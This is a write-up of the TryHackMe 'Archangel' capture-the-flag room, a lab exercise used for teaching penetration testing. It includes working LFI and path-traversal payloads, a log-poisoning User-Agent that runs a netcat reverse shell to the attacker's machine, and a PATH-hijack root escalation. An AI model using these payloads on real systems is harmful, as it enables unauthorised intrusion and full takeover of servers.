TryHackMe | Archangel Writeup
Hey, let’s go, my second write-up. I hope you liked my previous write-up of Madeye’s Castle.
You can find this room here: https://tryhackme.com/room/archangel
Overview
This is a Easy rated boot2root box, made by TryHackMe user Archangel. This box makes use of the Virtual Domain Name Hosting method. Once you get to the correct domain, you have to exploit the PHP include() function to get an LFI and then use that LFI to get a reverse shell on the machine. Once in, you need to exploit a cronjob to gain horizontal privilege. Finally, you need to spoof the PATH variable, to gain root access. Without any further ado, let’s get into it.
Let’s Break In!
Like always, first start with an Nmap scan:
sudo nmap -sS -sV -sC -oA nmap/archangel *THM Box IP* -vvHere -sS: SYN Scan, -sC: for “Safe” Scripts, or default scripts, -sV: for version enumeration, -oA: output in all format(Greppable, XML and default Nmap output), -vv: for verbose.
Nmap scan was completed fairly quickly, and we see that two ports are open on this machine. Port 80 and Port 22, which are default ports for HTTP and SSH respectively. Since we don’t have any way to login to the ssh right now, lets visit the webpage hosted on this machine.
On visiting the machine, we can see that it filled with a lot of Lorem Ipsum, nothing interesting there. Except, we see a domain based email “mafialive.thm”, in the websites contact info. It would appear that this website is using virtual domain name hosting. If you’d like to know more about VDNH you can do so by going here, where I go more in detail over this topic.
Coming back to our machine, add the new domain to our hosts file(IP address<space>domain name), and lets visit this website. On opening the website, a message appears saying this website is under development, with our very first flag, displayed right under it.
Next, we are asked to find a page under development. Now, there are two ways you can go about it:
The very first and a clever way(which my dumb-ass totally didn’t think of), is visiting the robots.txt file, and there you have it “test.php”.
What is robots.txt you ask?, consider it as a gatekeeper for a website. Ever wonder why sensitive data, such as admin webpages, assets and other information that a website stores never show up when you search for something?, robots.txt is your answer. Whenever a search-engine starts crawling a website for information, it first visits robots.txt, which then tells what location the search-engine, can and cannot crawl. So this information never shows up on search engines. The only problem with this, robots.txt has to be publicly accessible for the search-engine to view it. This means, that anyone in the world, with a little technological knowledge, can also read this file and visit the sup3r-s3cr3t location manually, completely defeating the purpose. This is the reason why different methods like .htaccess were invented, where you can implement user authentication for your secret webpage.
The second, and the scrub way of doing it, is by FUZZING the website. Yay, now I don’t have to do any thinking!. Just kidding, most of the time you will have to use a Fuzz tool in your workflow, I know I have to in every other box.
I like to use Gobuster for this task, you can use any tool you prefer.
gobuster dir -u http://mafialive.thm/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -x php,txt — threads 50 -o gobuster.outHere, dir: to specify directory brute-forcing, -u to specify the target URL, -w to specify the word-list, I use raft-small-wordlist. It is included in the SecLists over at GitHub, which you can clone in your own distro, and I recommend that you do, because they are very useful. Otherwise you can just download this particular word-list from here. -x: to specify the extension. This switch will add a .php and a .txt after every directory name to check if a file with the same name (also)exists. You can specify multiple file types, separated by a comma. --threads: to specify the number of requests made at a time. Use this switch very cautiously, as in the real world, huge number of request to a website will get you blacklisted. Since this is a virtual environment, it shouldn’t be a problem. -o: to specify the output file.
And Gobuster displays the same expected output “test.php”, so let’s go to this location. On visiting the location we see that this webpage wasn’t supposed to be deployed, which means lax security. *Happy Hacker Noises*.
There is a button present on the webpage, pressing it displays a message “Control is an illusion”. A Mr.Robot reference, nice!. And aptly placed too, because we are about to take away control using LFI(Local File Inclusion). Proxying the request through burp, we capture it and send it to burp repeater for further inspection.
After testing for LFI using some basic payloads, nothing turned up. I can’t read any file from outside the given directory, probably a check in place. We know a “robots.txt” file exists in this directory, lets try that. Substituting “mrrobot.php” with “robots.txt”, the content of “robots.txt” was reflected. Success!.
Next step was to actually examine the test.php, which should also be in the same folder. Replacing “robots.txt” for “test.php”, nothing turned up. Weird. Then I remembered that it was a PHP file, and won’t be rendered as normal. So, to actually read the contents of the file, I needed to parse it to something else. PHP has a inbuilt function to convert normal text to base64, so using that, the payload then became:
http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php
And we get the output in base64. We can decode it using CyberChef, or anything else really, and read the contents of test.php.
We can see that indeed, there was a check in place, so that we can’t traverse our path, and that “/var/www/html/development_testing” has to be included. So anything that we can do is restricted to this directory only, or is it!?(*Getting Dem Phoenix Wright Feels*). The thing is, that Linux treats “//” as “/”, so that means, even if “../..” is blocked, we can easily bypass it using “..//..”.
Bypassing the path traversal protection, and reading the access.log file, I saw that User-agent was being logged. Doing a simple google search showed me that indeed, this can be converted to RCE(Remote Code Execution) using a simple technique.
First, make a simple request to the domain, replacing the normal User-Agent with:
<?php exec(‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc *Your machine IP* 4444 >/tmp/f’) ?>
Then, open a netcat session in your terminal
nc -lvnp 4444 Here -l: to listen for an incoming connection request, -n: to stop netcat from performing domain name resolution, -v: for verbose and -p: to specify which port to listen on.
Then make another request to the website, this time by using LFI and calling access.log, which would've now logged our malicious code we passed as User-Agent, and will now execute it.
http://mafialive/test.php?view=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log
And we get a shell back. Awesome, isn’t it?
Now this is a very basic shell, with no tab-auto completion or Ctrl-c to stop current process. Ctrl-c on this shell and it will kill the connection, it has happened to me, and man was getting the connection back a bitch. ANYWAY, let’s upgrade the shell before proceeding.
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’This will give you a slightly better shell, but without those magical features. To get a fully functioning TTY shell:
Press Ctrl-z to background the current shell, then on your terminal type:
stty raw -echo; fg <enter><enter>Then on your shell:
stty rows 16 columns 136
export TERM=xterm-256color (if you don’t do this step, you won’t be able to open the text editor)
resetAnd you’ll feel right at home…. or maybe not.
Getting the user flag was easy, just go to the archangel directory, and cat the user.txt file.
Now, escalating our privilege, there was a folder named myfiles, in which there was a file called password backup, when I outputted the file it had a link to a YouTube video. If you have done any amount of CTFs, you very well know where this is leading up to. A “Rick Astley — Never Gonna Give You Up” video. I swear to god, if I see this video one more time. See man, no offense but this meme has been going on for too long, and at this point it is just painful to watch. Moving on. There was another folder by the name secret, but I didn’t have the permission to open it.
I tried running sudo -l, but since I didn’t know password to www-data, this wasn’t an option. Next, I tried to a binary with SUID bit, no luck there either. Next, I looked for some cronjobs that might be running, but nothing was.
After exhausting all my options, I tried looking for any interesting files user archangel may own. Using the find command:
find / -user archangel -type f 2>/dev/null | grep -v /procHere, /: specifies the directory from where to begin searching(root in this case), -user: only show files owned by particular user, -type: specify what to find, 2>/dev/null: This option is a little complex in its entirety, so just understand this, it will hide any error during the execution of this command. |: pipes the output of the left command, as an input to the right command. grep: to grab a particular pattern from a given input, -v: to hide the specified pattern.
And we finally! find something interesting, a bash script owned by the user. If we can modify the file we can maybe see what’s inside the secret folder. We did have the permission to write in the script, but when I tried cd’ing into the secret directory, permission was denied, and no matter what I did, I couldn’t see the contents of the folder. So, I tried getting a reverse shell on my machine. Changing the file to a python executable, and using the reverse shell from swisskyrepo.
I executed the file and got a reverse shell as…. www-data. That’s a lot of work, just to fail isn’t it. Just for the sake of it, I tried running it as the user archangel sudo -u archangel ./helloworld, because there wasn’t anything else to do really, first it asked for www-data’s credentials, thinking it was the wrong way to go about it, I pressed Ctrl-c to exit, and I got a reverse shell back…. as archangel?.
I was surprised to say the least, I don’t think this was the intended route, I’ll update the article when I get to know about it. Until then, let’s move on.
Update: Okay, it looks like I just ignored the crontab output, apparently there was a cronjob running every minute, executing helloworld.sh as the user archangel. That was the reason why I got the reverse shell back. If you’re wondering what a cronjob is, let me explain to you in brief. Basically, Cron is a time-based job scheduler which is preinstalled in every Unix based distribution. Using Cron, you can schedule some menial tasks which you would like to be executed after a certain amount of time, you can also specify which user the said job will be running as, archangel in the case above. These repeating tasks that Cron performs are called cronjobs, and can be viewed in the file /etc/cronjob.
After getting the privilege escalation, I cd’ed into the secret directory and got the second flag. Also, I understood the real way to do it, as it was very clearly mentioned in the flag. Eh, what’s done is done amirite. No, no, worry not, I’ll update the article when I do it the right way.
In the secret folder, apart from the flag, there was also a binary executable file, with a SUID bit. I exported the file to my computer for further inspection.
Opening the file using Ghidra, and de-compiling the main function, the binary was making a system call to the cp function, and the binary was running as root, this would mean if I can somehow replace the system cp binary with my own, I can get root access.
To do that, first create a file called cp in the secret folder(or any folder, just remember to set the PATH variable correctly). Inside the cp folder, set the payload to:
#!/bin/bash
bash -p
And give it executable permission(chmod +x cp just in case you were wondering). This will give you root access when executed. Next, set the PATH variable using:
export PATH=$PWD:$PATHI did this so that system will first check for the cp file in this directory, instead of going to the system defined cp file.
I executed the binary, got the root access and solved the box.
If you have any suggestions, do let me know in the comments.
Have a nice day.
